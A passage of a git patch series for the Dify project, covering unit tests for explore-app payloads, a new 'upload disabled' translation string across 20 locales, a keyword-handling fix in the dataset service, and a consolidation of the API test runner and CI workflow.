condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 From 323e0c4d3072adbcb68a3eda28d86ab304960c4f Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 15 Dec 2025 12:02:28 +0800 Subject: [PATCH 20/68] chore(i18n): translate i18n files and update type definitions (#29651) Co-authored-by: crazywoola <100913391+crazywoola@users.noreply.github.com> --- web/i18n/ar-TN/common.ts | 1 + web/i18n/de-DE/common.ts | 1 + web/i18n/es-ES/common.ts | 1 + web/i18n/fa-IR/common.ts | 1 + web/i18n/fr-FR/common.ts | 1 + web/i18n/hi-IN/common.ts | 1 + web/i18n/id-ID/common.ts | 1 + web/i18n/it-IT/common.ts | 1 + web/i18n/ko-KR/common.ts | 1 + web/i18n/pl-PL/common.ts | 1 + web/i18n/pt-BR/common.ts | 1 + web/i18n/ro-RO/common.ts | 1 + web/i18n/ru-RU/common.ts | 1 + web/i18n/sl-SI/common.ts | 1 + web/i18n/th-TH/common.ts | 1 + web/i18n/tr-TR/common.ts | 1 + web/i18n/uk-UA/common.ts | 1 + web/i18n/vi-VN/common.ts | 1 + web/i18n/zh-Hans/common.ts | 1 + web/i18n/zh-Hant/common.ts | 1 + 20 files changed, 20 insertions(+) diff --git a/web/i18n/ar-TN/common.ts b/web/i18n/ar-TN/common.ts index 58ce1ad01b..10788713a4 100644 --- a/web/i18n/ar-TN/common.ts +++ b/web/i18n/ar-TN/common.ts @@ -743,6 +743,7 @@ const translation = { pasteFileLinkInvalid: 'رابط الملف غير صالح', fileExtensionNotSupport: 'امتداد الملف غير مدعوم', fileExtensionBlocked: 'تم حظر نوع الملف هذا لأسباب أمنية', + uploadDisabled: 'تم تعطيل رفع الملفات', }, tag: { placeholder: 'جميع العلامات', diff --git a/web/i18n/de-DE/common.ts b/web/i18n/de-DE/common.ts index 98ff2eae19..337406c719 100644 --- a/web/i18n/de-DE/common.ts +++ b/web/i18n/de-DE/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerReadError: 'Lesen der Datei fehlgeschlagen, bitte versuchen Sie es erneut.', fileExtensionNotSupport: 'Dateiendung nicht bedient', fileExtensionBlocked: 'Dieser Dateityp ist aus Sicherheitsgründen gesperrt', + uploadDisabled: 'Datei-Upload ist deaktiviert', }, license: { expiring: 'Läuft an einem Tag ab', diff --git a/web/i18n/es-ES/common.ts b/web/i18n/es-ES/common.ts index 8ce59419e8..1972183946 100644 --- a/web/i18n/es-ES/common.ts +++ b/web/i18n/es-ES/common.ts @@ -734,6 +734,7 @@ const translation = { pasteFileLinkInputPlaceholder: 'Introduzca la URL...', uploadFromComputerLimit: 'El archivo de carga no puede exceder {{size}}', fileExtensionBlocked: 'Este tipo de archivo está bloqueado por motivos de seguridad', + uploadDisabled: 'La carga de archivos está deshabilitada', }, license: { expiring: 'Caduca en un día', diff --git a/web/i18n/fa-IR/common.ts b/web/i18n/fa-IR/common.ts index 79a55add01..40c1a57d24 100644 --- a/web/i18n/fa-IR/common.ts +++ b/web/i18n/fa-IR/common.ts @@ -734,6 +734,7 @@ const translation = { pasteFileLink: 'پیوند فایل را جایگذاری کنید', uploadFromComputerLimit: 'آپلود فایل نمی تواند از {{size}} تجاوز کند', fileExtensionBlocked: 'این نوع فایل به دلایل امنیتی مسدود شده است', + uploadDisabled: 'بارگذاری فایل غیرفعال است', }, license: { expiring_plural: 'انقضا در {{count}} روز', diff --git a/web/i18n/fr-FR/common.ts b/web/i18n/fr-FR/common.ts index e33eb75b65..525f3a28c0 100644 --- a/web/i18n/fr-FR/common.ts +++ b/web/i18n/fr-FR/common.ts @@ -734,6 +734,7 @@ const translation = { pasteFileLinkInvalid: 'Lien de fichier non valide', uploadFromComputerLimit: 'Le fichier de téléchargement ne peut pas dépasser {{size}}', fileExtensionBlocked: 'Ce type de fichier est bloqué pour des raisons de sécurité', + uploadDisabled: 'Le téléchargement de fichiers est désactivé', }, license: { expiring: 'Expirant dans un jour', diff --git a/web/i18n/hi-IN/common.ts b/web/i18n/hi-IN/common.ts index c0b401272f..c6151f5988 100644 --- a/web/i18n/hi-IN/common.ts +++ b/web/i18n/hi-IN/common.ts @@ -756,6 +756,7 @@ const translation = { fileExtensionNotSupport: 'फ़ाइल एक्सटेंशन समर्थित नहीं है', uploadFromComputer: 'स्थानीय अपलोड', fileExtensionBlocked: 'सुरक्षा कारणों से इस फ़ाइल प्रकार को अवरुद्ध कर दिया गया है', + uploadDisabled: 'फ़ाइल अपलोड अक्षम है', }, license: { expiring: 'एक दिन में समाप्त हो रहा है', diff --git a/web/i18n/id-ID/common.ts b/web/i18n/id-ID/common.ts index 43ce9f9adc..cac1696768 100644 --- a/web/i18n/id-ID/common.ts +++ b/web/i18n/id-ID/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerReadError: 'Pembacaan file gagal, silakan coba lagi.', fileExtensionBlocked: 'Tipe file ini diblokir karena alasan keamanan', uploadFromComputerLimit: 'Unggahan {{type}} tidak boleh melebihi {{size}}', + uploadDisabled: 'Unggah file dinonaktifkan', }, tag: { noTag: 'Tidak ada tag', diff --git a/web/i18n/it-IT/common.ts b/web/i18n/it-IT/common.ts index 4974408583..d8eb7935bf 100644 --- a/web/i18n/it-IT/common.ts +++ b/web/i18n/it-IT/common.ts @@ -764,6 +764,7 @@ const translation = { pasteFileLink: 'Incolla il collegamento del file', uploadFromComputerReadError: 'Lettura del file non riuscita, riprovare.', fileExtensionBlocked: 'Questo tipo di file è bloccato per motivi di sicurezza', + uploadDisabled: 'Il caricamento dei file è disabilitato', }, license: { expiring_plural: 'Scadenza tra {{count}} giorni', diff --git a/web/i18n/ko-KR/common.ts b/web/i18n/ko-KR/common.ts index 0720107562..99ac7a2d70 100644 --- a/web/i18n/ko-KR/common.ts +++ b/web/i18n/ko-KR/common.ts @@ -730,6 +730,7 @@ const translation = { uploadFromComputerLimit: '업로드 파일은 {{size}}를 초과할 수 없습니다.', uploadFromComputerUploadError: '파일 업로드에 실패했습니다. 다시 업로드하십시오.', fileExtensionBlocked: '보안상의 이유로 이 파일 형식은 차단되었습니다', + uploadDisabled: '파일 업로드가 비활성화되었습니다', }, license: { expiring_plural: '{{count}}일 후에 만료', diff --git a/web/i18n/pl-PL/common.ts b/web/i18n/pl-PL/common.ts index 9c2a0810ce..938208da34 100644 --- a/web/i18n/pl-PL/common.ts +++ b/web/i18n/pl-PL/common.ts @@ -752,6 +752,7 @@ const translation = { fileExtensionNotSupport: 'Rozszerzenie pliku nie jest obsługiwane', uploadFromComputer: 'Przesyłanie lokalne', fileExtensionBlocked: 'Ten typ pliku jest zablokowany ze względów bezpieczeństwa', + uploadDisabled: 'Przesyłanie plików jest wyłączone', }, license: { expiring_plural: 'Wygasa za {{count}} dni', diff --git a/web/i18n/pt-BR/common.ts b/web/i18n/pt-BR/common.ts index 8f3fad6cbb..1a5c531535 100644 --- a/web/i18n/pt-BR/common.ts +++ b/web/i18n/pt-BR/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerLimit: 'Carregar arquivo não pode exceder {{size}}', uploadFromComputerUploadError: 'Falha no upload do arquivo, faça o upload novamente.', fileExtensionBlocked: 'Este tipo de arquivo está bloqueado por razões de segurança', + uploadDisabled: 'Envio de arquivo desativado', }, license: { expiring: 'Expirando em um dia', diff --git a/web/i18n/ro-RO/common.ts b/web/i18n/ro-RO/common.ts index 85e29e6895..4a5004ae2c 100644 --- a/web/i18n/ro-RO/common.ts +++ b/web/i18n/ro-RO/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerLimit: 'Încărcarea fișierului nu poate depăși {{size}}', pasteFileLink: 'Lipiți linkul fișierului', fileExtensionBlocked: 'Acest tip de fișier este blocat din motive de securitate', + uploadDisabled: 'Încărcarea fișierelor este dezactivată', }, license: { expiring: 'Expiră într-o zi', diff --git a/web/i18n/ru-RU/common.ts b/web/i18n/ru-RU/common.ts index 4252f9adb7..45ad5150e2 100644 --- a/web/i18n/ru-RU/common.ts +++ b/web/i18n/ru-RU/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerLimit: 'Файл загрузки не может превышать {{size}}', uploadFromComputerUploadError: 'Загрузка файла не удалась, пожалуйста, загрузите еще раз.', fileExtensionBlocked: 'Этот тип файла заблокирован по соображениям безопасности', + uploadDisabled: 'Загрузка файлов отключена', }, license: { expiring: 'Срок действия истекает за один день', diff --git a/web/i18n/sl-SI/common.ts b/web/i18n/sl-SI/common.ts index b848e68619..ce898fb085 100644 --- a/web/i18n/sl-SI/common.ts +++ b/web/i18n/sl-SI/common.ts @@ -719,6 +719,7 @@ const translation = { uploadFromComputerLimit: 'Nalaganje {{type}} ne sme presegati {{size}}', uploadFromComputerReadError: 'Branje datoteke ni uspelo, poskusite znova.', fileExtensionBlocked: 'Ta vrsta datoteke je zaradi varnostnih razlogov blokirana', + uploadDisabled: 'Nalaganje datotek je onemogočeno', }, tag: { addTag: 'Dodajanje oznak', diff --git a/web/i18n/th-TH/common.ts b/web/i18n/th-TH/common.ts index 23dfbe38a7..9e67c3559f 100644 --- a/web/i18n/th-TH/common.ts +++ b/web/i18n/th-TH/common.ts @@ -714,6 +714,7 @@ const translation = { pasteFileLinkInvalid: 'ลิงก์ไฟล์ไม่ถูกต้อง', fileExtensionNotSupport: 'ไม่รองรับนามสกุลไฟล์', fileExtensionBlocked: 'ประเภทไฟล์นี้ถูกบล็อกด้วยเหตุผลด้านความปลอดภัย', + uploadDisabled: 'การอัปโหลดไฟล์ถูกปิดใช้งาน', }, tag: { placeholder: 'แท็กทั้งหมด', diff --git a/web/i18n/tr-TR/common.ts b/web/i18n/tr-TR/common.ts index a9b056893c..f9d55265bf 100644 --- a/web/i18n/tr-TR/common.ts +++ b/web/i18n/tr-TR/common.ts @@ -734,6 +734,7 @@ const translation = { pasteFileLinkInvalid: 'Geçersiz dosya bağlantısı', fileExtensionNotSupport: 'Dosya uzantısı desteklenmiyor', fileExtensionBlocked: 'Bu dosya türü güvenlik nedenleriyle engellenmiştir', + uploadDisabled: 'Dosya yükleme devre dışı', }, license: { expiring_plural: '{{count}} gün içinde sona eriyor', diff --git a/web/i18n/uk-UA/common.ts b/web/i18n/uk-UA/common.ts index 11d294709e..be7186fca8 100644 --- a/web/i18n/uk-UA/common.ts +++ b/web/i18n/uk-UA/common.ts @@ -735,6 +735,7 @@ const translation = { uploadFromComputerReadError: 'Не вдалося прочитати файл, будь ласка, спробуйте ще раз.', uploadFromComputerUploadError: 'Не вдалося завантажити файл, будь ласка, завантажте ще раз.', fileExtensionBlocked: 'Цей тип файлу заблоковано з міркувань безпеки', + uploadDisabled: 'Завантаження файлів вимкнено', }, license: { expiring: 'Термін дії закінчується за один день', diff --git a/web/i18n/vi-VN/common.ts b/web/i18n/vi-VN/common.ts index 131306edc4..2d30d3240e 100644 --- a/web/i18n/vi-VN/common.ts +++ b/web/i18n/vi-VN/common.ts @@ -734,6 +734,7 @@ const translation = { uploadFromComputerUploadError: 'Tải lên tệp không thành công, vui lòng tải lên lại.', uploadFromComputerReadError: 'Đọc tệp không thành công, vui lòng thử lại.', fileExtensionBlocked: 'Loại tệp này bị chặn vì lý do bảo mật', + uploadDisabled: 'Tải tệp bị vô hiệu hóa', }, license: { expiring_plural: 'Hết hạn sau {{count}} ngày', diff --git a/web/i18n/zh-Hans/common.ts b/web/i18n/zh-Hans/common.ts index a9228a5a25..7bb1bff826 100644 --- a/web/i18n/zh-Hans/common.ts +++ b/web/i18n/zh-Hans/common.ts @@ -737,6 +737,7 @@ const translation = { pasteFileLinkInvalid: '文件链接无效', fileExtensionNotSupport: '文件类型不支持', fileExtensionBlocked: '出于安全考虑,该文件类型已被禁止上传', + uploadDisabled: '文件上传已被禁用', }, tag: { placeholder: '全部标签', diff --git a/web/i18n/zh-Hant/common.ts b/web/i18n/zh-Hant/common.ts index cbcdea4462..1b1d222845 100644 --- a/web/i18n/zh-Hant/common.ts +++ b/web/i18n/zh-Hant/common.ts @@ -734,6 +734,7 @@ const translation = { fileExtensionNotSupport: '不支援檔擴展名', uploadFromComputerLimit: '上傳文件不能超過 {{size}}', fileExtensionBlocked: '出於安全原因,此檔案類型被阻止', + uploadDisabled: '檔案上傳已被禁用', }, license: { expiring: '將在 1 天內過期', From 1e47ffb50c19ba456aa295bbb7fd80788615eb69 Mon Sep 17 00:00:00 2001 From: Sai Date: Mon, 15 Dec 2025 12:32:52 +0800 Subject: [PATCH 21/68] fix: does not save segment vector when there is no attachment_ids (#29520) Co-authored-by: sai <> Co-authored-by: crazywoola <100913391+crazywoola@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- api/services/dataset_service.py | 28 ++++++++++++++-------------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index 8097a6daa0..0df883ea98 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -2817,20 +2817,20 @@ class SegmentService: db.session.add(binding) db.session.commit() - # save vector index - try: - VectorService.create_segments_vector( - [args["keywords"]], [segment_document], dataset, document.doc_form - ) - except Exception as e: - logger.exception("create segment index failed") - segment_document.enabled = False - segment_document.disabled_at = naive_utc_now() - segment_document.status = "error" - segment_document.error = str(e) - db.session.commit() - segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() - return segment + # save vector index + try: + keywords = args.get("keywords") + keywords_list = [keywords] if keywords is not None else None + VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form) + except Exception as e: + logger.exception("create segment index failed") + segment_document.enabled = False + segment_document.disabled_at = naive_utc_now() + segment_document.status = "error" + segment_document.error = str(e) + db.session.commit() + segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first() + return segment except LockNotOwnedError: pass From 80c74cf725aeb6055b4eb03aabacf82aaec907a3 Mon Sep 17 00:00:00 2001 From: -LAN- Date: Mon, 15 Dec 2025 13:20:31 +0800 Subject: [PATCH 22/68] test: Consolidate API CI test runner (#29440) Signed-off-by: -LAN- Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- .coveragerc | 5 ++ .github/workflows/api-tests.yml | 23 ++++---- api/extensions/ext_blueprints.py | 24 +++++--- api/pytest.ini | 2 +- api/tests/integration_tests/conftest.py | 5 ++ .../conftest.py | 39 ++++++++++++- .../redis/test_sharded_channel.py | 3 +- api/tests/unit_tests/conftest.py | 45 +++++++++++++- api/tests/unit_tests/oss/__mock/base.py | 4 +- .../unit_tests/oss/opendal/test_opendal.py | 18 +++--- dev/pytest/pytest_all_tests.sh | 20 ------- dev/pytest/pytest_artifacts.sh | 9 --- dev/pytest/pytest_full.sh | 58 +++++++++++++++++++ dev/pytest/pytest_model_runtime.sh | 18 ------ dev/pytest/pytest_testcontainers.sh | 9 --- dev/pytest/pytest_tools.sh | 9 --- dev/pytest/pytest_workflow.sh | 9 --- 17 files changed, 186 insertions(+), 114 deletions(-) create mode 100644 .coveragerc delete mode 100755 dev/pytest/pytest_all_tests.sh delete mode 100755 dev/pytest/pytest_artifacts.sh create mode 100755 dev/pytest/pytest_full.sh delete mode 100755 dev/pytest/pytest_model_runtime.sh delete mode 100755 dev/pytest/pytest_testcontainers.sh delete mode 100755 dev/pytest/pytest_tools.sh delete mode 100755 dev/pytest/pytest_workflow.sh diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..ab7878dc64 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -94,4 +94,3 @@ jobs: echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/pytest.ini b/api/pytest.ini index afb53b47cc..4a9470fa0c 100644 --- a/api/pytest.ini +++ b/api/pytest.ini @@ -1,5 +1,5 @@ [pytest] -addopts = --cov=./api --cov-report=json --cov-report=xml +addopts = --cov=./api --cov-report=json env = ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. + """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..af60adf1fb 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -240,8 +240,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def _patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/oss/__mock/base.py b/api/tests/unit_tests/oss/__mock/base.py index 974c462289..5bde461d94 100644 --- a/api/tests/unit_tests/oss/__mock/base.py +++ b/api/tests/unit_tests/oss/__mock/base.py @@ -14,7 +14,9 @@ def get_example_bucket() -> str: def get_opendal_bucket() -> str: - return "./dify" + import os + + return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage") def get_example_filename() -> str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - 